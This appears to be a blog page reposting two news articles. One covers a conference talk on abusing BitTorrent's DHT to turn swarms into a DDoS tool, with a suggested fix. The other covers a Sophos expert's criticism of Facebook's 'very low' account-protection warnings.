A recent talk at the Chaos Communications Congress revealed how BitTorrent swarms can be exploited to take down large websites with relative ease. A vulnerability in the technology behind so called trackerless torrents makes it possible for someone to trick downloaders of popular files into send thousands of requests to a webserver of choice, taking it down as a result. Basically, this turns BitTorrent into a very effective DDoS tool. 

BitTorrent is one of the most effective technologies to transfer large digital files to many people at once. Unlike a central server, transfers actually tend to go faster as more people share the same files. This characteristic is one of the reasons why it has evolved into the dominant file-sharing platform in recent years.


Every day millions of people are downloading files via BitTorrent, and in some instances more than 100,000 people are sharing the same file at the same time. These large ‘swarms’ of peers are great for sharing, but they also pose a threat as became apparent at the Chaos Communications Congress (CCC) recently.

In a talk titled “Lying To The Neighbours” it was shown that the DHT technology which powers “trackerless torrents” can be abused to let BitTorrent downloaders effectively DDoS a webserver of choice. DHT’s normal function is to find peers who are downloading the same files, but without communicating with a central BitTorrent tracker. This ensures that downloads can continue even when the central tracker goes offline.

According to the presenter who goes by the name ‘Astro’, Kademlia based DHT can be exploited by a malicious peer to carry out a DDoS attack. If there are enough peers downloading the same file, this could easily take down medium to large websites. The worrying part is that the downloaders who are participating in the DDoS will not be aware of what’s going on.

“The core problem are the random NodeIDs. The address hashing and verification scheme works for scenarios like the old Internet, but becomes almost useless in the big address space of IPv6,” Astro told TorrentFreak in a comment. As a result, any BitTorrent swarm can be abused to target specific websites and potentially take them down.

This and other DHT vulnerabilities are not entirely new concepts for BitTorrent developers. They have been discussed in various places already, but no agreement on how they should be dealt with has yet been reached.

Over the last months DDoS attacks have been in the news regularly, mostly carried out under the flag of Anonymous’ Operation Payback. Initially anti-piracy targets such as the MPAA and RIAA were taken offline, and last month the focus switched to organizations that acted against Wikileaks, including Mastercard and Paypal.

While these attacks required hundreds of people to actively participate and fire up their LOIC application at the same time, the BitTorrent DDoS could take down the same sites from a single computer, using BitTorrent downloads as a ‘botnet’. But, where there’s a problem there’s a solution, and Astro has some pointers for BitTorrent developers.

“Not connecting to privileged ports (< 1024) where most critical services reside," is one ad-hoc solution, but Astro says that since it's a design error, the protocol has to be redefined eventually.

The idea of using BitTorrent as a DDoS tool is not entirely new. In fact, researchers have previously shown that adding a webserver’s IP address as a BitTorrent tracker could result in a similar DDoS. The downside of this method is, however, that it requires a torrent file to become popular, while the DHT method can simply exploit existing torrents that are already being downloaded by thousands of people.

It will be interesting to see if BitTorrent developers are going to act upon the DHT vulnerability in the coming months and come up with a solution to prevent this kind of abuse.

Happy New Year :)

Baca Selengkapnya... BotTorrent? Using BitTorrent as a DDoS Tool

Facebook Scare Tactics Knocked by Security Pro

By John P. Mello Jr., PC World

Have you received a warning from Facebook that your account protection is "very low?" Don't panic. Your security settings may be stronger than Facebook would lead you to believe -- and that's ticked off one security expert. "The suggestion that users' accounts currently have a protection status of 'very low' is entirely misleading and stinks of scare tactics," declared Graham Cluley, a senior technology consultant with security software maker Sophos. 

Facebook has been contacting its members for several weeks now with its "very low" security protection warnings. In the alerts, the company includes a link. Click the link and you're taken to a page that requests additional personal information about you. Sound familiar? This is exactly the tactic used by Internet highwaymen to steal sensitive information from unwitting web users and plant malicious software on their computers.

"With fake antivirus (also known as scareware) attacks becoming an ever-growing problem (they attempt to trick you into believing your computer has a security problem when it doesn't), some security-conscious Facebook users might worry that this is a similarly-styled assault, designed to scare you into taking perhaps unwise actions," Cluley wrote at Sophos's Naked Security blog. 

In order to increase your account's security protection, Facebook asks for an alternative e-mail address, a mobile phone number, and an updated security question. You might be able to deduce what Facebook is up to by those requests. Its security protection warning isn't about security protection at all, but enabling its members to regain access to their accounts should they be compromised.  

"There's nothing necessarily wrong with Facebook giving its millions of users a way of verifying their identity should they lose access to their account, but clearly it should have been presented better and more thought should have gone into how this system was implemented," Cluley wrote. 

He suggests that a better approach to what Facebook is trying to accomplish would be a message such as, "We can help you recover your account if it gets hacked; want to know more?"

"I'm not going to tell you not to give Facebook the information they're requesting in this 'account protection' push, but I would suggest that you think carefully before doing so," he cautions.

Baca Selengkapnya... Facebook Scare Tactics Knocked by Security Pro